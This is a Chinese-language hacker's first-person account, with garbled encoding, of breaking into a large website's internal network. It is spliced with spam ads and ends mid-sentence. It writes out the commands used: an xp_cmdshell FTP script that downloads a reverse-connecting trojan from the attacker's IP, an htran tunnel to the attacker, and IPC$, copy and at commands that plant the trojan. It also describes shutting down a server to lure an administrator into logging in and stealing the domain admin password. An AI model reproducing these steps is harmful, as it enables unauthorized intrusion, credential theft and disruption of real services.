社會(huì)工程學(xué)的思維突破內(nèi)網(wǎng).doc

社會(huì)工程學(xué)的思維突破內(nèi)網(wǎng) 文/KYO 前些天剛收到e-mail，得知我通過(guò)了CISP的考試。高興之余把我滲透一個(gè)全世界排名100多名的大站的過(guò)程寫出來(lái)，也好和大家一起學(xué)習(xí)，共同進(jìn)步。 至于入侵的原因，我也不多說(shuō)了。目標(biāo)是mms.*.com，是用aspx寫的，先用iiswrite.exe檢測(cè)一下，結(jié)果如下：通過(guò)檢測(cè)結(jié)果，大概可以了解到目標(biāo)WEB服務(wù)器是win2000，我認(rèn)為至少比win2003搞起來(lái)輕松點(diǎn)。不過(guò)通過(guò)域名查詢知道，服務(wù)器IP沒(méi)有綁定任何國(guó)際域名，首先旁注是沒(méi)轍了。再?gòu)膾呙璧亩丝谏蟻?lái)看，只開了21和80，只有ftp服務(wù)和web對(duì)外開放，肯定做了安全策略和安裝了防火墻。既然開了FTP，就登陸試試看看返回的信息是什么吧。220 hw-9ab3d94fe590 Microsoft FTP Service (Version 5.0).從以上信息得知，服務(wù)器十有八九用的是微軟自帶的FTP（至于是否改了binner，盡量先不考慮），至少想從webshell上利用serv-u提升權(quán)限是不可能的了。另外還有一點(diǎn)信息hw-9ab3d94fe590即為該機(jī)器的機(jī)器名。那么FTP的帳戶信息和該服務(wù)器的帳戶應(yīng)該是一一對(duì)應(yīng)的，暴力破解的苦力活我是不做了，意義不大。然后再看80，aspx的，首先注入是找不到了，后臺(tái)猜了半天也沒(méi)猜出來(lái)，看來(lái)主動(dòng)進(jìn)攻不太好進(jìn)行。*這里插播個(gè)廣告，黑友們請(qǐng)無(wú)視，只是為朋友的網(wǎng)站能被搜索引擎收錄，多加點(diǎn)流量。返利網(wǎng),淘你喜歡,淘寶返利,淘寶返現(xiàn)購(gòu)物。* 換個(gè)思路吧，看看他的C類段有沒(méi)有弱弱的機(jī)子，經(jīng)過(guò)掃描知道，那個(gè)C類網(wǎng)段基本都是這個(gè)網(wǎng)站的分站。經(jīng)過(guò)艱苦的尋找和測(cè)試，利用一個(gè)掃描網(wǎng)站多級(jí)目錄頁(yè)面的辦法找到一個(gè)上傳頁(yè)面，后面的事情大家都知道怎么做的，抓包，改數(shù)據(jù)，再用NC提交。不過(guò)第一次沒(méi)有成功，提示寫入失敗，既然默認(rèn)的目錄不可寫，那我們?cè)诰W(wǎng)站上隨便再找一個(gè)認(rèn)為可寫的目錄再測(cè)試，經(jīng)過(guò)查找源代碼里面的信息，找到一個(gè)圖片目錄，然后再修改包的內(nèi)容，再用NC提交，OK，這次成功了。拿到了他C類段一個(gè)站的WEBSHELL。通過(guò)服務(wù)器組建探測(cè)，知道他沒(méi)有禁用WScript.Shell那么我們可以了解到很多信息。通過(guò)ipconfig /all 了解到他們的站基本上都是內(nèi)網(wǎng)的服務(wù)，然后把一些服務(wù)的端口映射出來(lái)的。Net start發(fā)現(xiàn)本機(jī)開了終端和radmin，但是我們連不上的。再進(jìn)入系統(tǒng)目錄下，看他打補(bǔ)丁的情況，通過(guò)補(bǔ)丁編號(hào)，又知道他系統(tǒng)已經(jīng)打上最新補(bǔ)丁。就算他們內(nèi)網(wǎng)之間開了445，MS05039也用不了。再通過(guò)net localgroup administrators得到從這里我看到了希望，因?yàn)橄到y(tǒng)管理員有域管理員帳號(hào)，那么我們不管拿到哪臺(tái)機(jī)子的系統(tǒng)權(quán)限，如果域管理員在線，findpass就可以得到域管理員密碼了。好了，準(zhǔn)備工作做了這么多，下面開始提升權(quán)限。幸好他網(wǎng)站數(shù)據(jù)庫(kù)用的是ms sqlserver，找到Web.config,我們得到了sqlserver的用戶名和密碼，再利用2006自帶的微軟數(shù)據(jù)庫(kù)查看/操作器連接數(shù)據(jù)庫(kù)服務(wù)器。轉(zhuǎn)到命令執(zhí)行那里，exec master.dbo.xp_cmdshell “ping myip” ,馬上看到我的天網(wǎng)有反映了，那么至少知道xp_cmdshell是可以用的。下面就簡(jiǎn)單了。利用以下腳本echo open myipkk1.txtecho kyokk1.txtecho kyo327kk1.txtecho get muma.exekk1.txtecho byekk1.txtftp -s:kk1.txt向數(shù)據(jù)庫(kù)服務(wù)器上傳我的反連的馬。這樣我們現(xiàn)在就拿到了數(shù)據(jù)庫(kù)服務(wù)器的系統(tǒng)權(quán)限?？梢钥吹轿覉?zhí)行query user,顯示沒(méi)有用戶。那怎么辦？嗅探吧。不能遠(yuǎn)程登陸3389，我用htran.exe轉(zhuǎn)出來(lái)再登陸。登上去以后準(zhǔn)備再傳一個(gè)cain，嗅探目標(biāo)的21端口，雖然希望不大，可這也是沒(méi)有辦法的辦法。為了不把我的shell弄死，我echo一個(gè)bat然后用at命令執(zhí)行。具體語(yǔ)句為：echo htran -slave myip 3389k.bat然后我在本機(jī)監(jiān)聽htran -listen 83 3389*這里插播個(gè)廣告，黑友們請(qǐng)無(wú)視，只是為朋友的網(wǎng)站能被搜索引擎收錄，多加點(diǎn)流量。返利網(wǎng),淘你喜歡,淘寶返利,淘寶返現(xiàn)購(gòu)物。*等任務(wù)時(shí)間一到，我馬上打開終端登陸器，連接，輸入我剛加的用戶名密碼以后，卻彈出以下畫面：暈了，看來(lái)他們最后還有一手，哎，登陸終端又失敗了。 想了許久，感覺(jué)突破口就是怎么才能讓域管理登陸，我想如果他們網(wǎng)頁(yè)壞了，他們肯定會(huì)去維護(hù)的，不過(guò)他也可以登陸ftp維護(hù)啊。最終的辦法只有一個(gè)，先把得到WEBSHELL那個(gè)站的首頁(yè)改名（呵呵，我不做破壞的），然后直接shutdown掉那臺(tái)服務(wù)器。這樣他就不得不登陸了。我是在半夜4點(diǎn)多做完了這件事，一直熬到8點(diǎn)鐘，再刷新那個(gè)網(wǎng)站，發(fā)現(xiàn)已經(jīng)恢復(fù)了，馬上用我的后門登陸到他的CMD下的shell，執(zhí)行query user,果然有域管理員在線，接著findpass，這就是我利用社會(huì)工程學(xué)拿到了域管理員密碼的真實(shí)過(guò)程。并且我半個(gè)小時(shí)后再登陸后門query user，就發(fā)現(xiàn)沒(méi)有用戶了，看來(lái)他們的管理員也懂一點(diǎn)安全知識(shí)。幸虧我做的及時(shí)啊。拿到域管理員密碼再進(jìn)那個(gè)目標(biāo)機(jī)就簡(jiǎn)單多了。過(guò)程就是利用以下語(yǔ)句Net use 92ipc$ “pass” /user:domainadministrator先和目標(biāo)機(jī)建立ipc連接。這里肯定有人問(wèn)了，你怎么得到目標(biāo)機(jī)的內(nèi)網(wǎng)IP的。其實(shí)前面已經(jīng)做了鋪墊，我由ftp返回的binner信息知道了目標(biāo)機(jī)的機(jī)器名，那么我內(nèi)網(wǎng)CMDSHELL下直接ping機(jī)器名就OK了。Copy muma.exe 92admin$system32muma.exe把木馬copy到目標(biāo)機(jī)Net time 92得到目標(biāo)機(jī)的時(shí)間At 92 time muma.exe執(zhí)行我的反連木馬到此為止，我的這次入侵就結(jié)束了。說(shuō)到底如何讓域管理員登陸是最重要的，不然我的一切勞動(dòng)都成為炮灰。其實(shí)社會(huì)工程學(xué)博大精深，我這